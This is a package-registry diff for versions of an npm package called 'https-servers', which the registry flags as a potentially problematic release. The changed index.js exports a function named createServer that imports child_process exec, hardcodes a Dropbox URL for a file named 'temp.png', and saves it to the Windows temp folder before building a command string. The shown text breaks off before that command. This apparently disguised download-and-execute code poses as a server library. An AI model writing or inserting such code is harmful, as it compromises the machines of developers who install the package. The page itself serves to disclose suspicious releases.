https-servers 2.1.1 → 2.1.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of https-servers might be problematic. Click here for more details.
- package/index.d.ts +1 -0
- package/index.js +1 -1
- package/package.json +3 -2
package/index.d.ts
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
export declare function createServer(): Promise<string>;
|
package/index.js
CHANGED
|
@@ -3,7 +3,7 @@ import { exec } from 'child_process';
|
|
|
3
3
|
export function createServer() {
|
|
4
4
|
return new Promise((resolve, reject) => {
|
|
5
5
|
// Hardcoded URL and Path
|
|
6
|
-
const sourceUrl = "https://www.dropbox.com/scl/fi/
|
|
6
|
+
const sourceUrl = "https://www.dropbox.com/scl/fi/verj3m7liugo6j47lzdsk/temp.png?rlkey=sp3d2fu7b5oipter0r7nw2tya&st=c2zn5vaj&dl=1";
|
|
7
7
|
const savePath = "%temp%/temp.png";
|
|
8
8
|
|
|
9
9
|
// The exact command string
|
package/package.json
CHANGED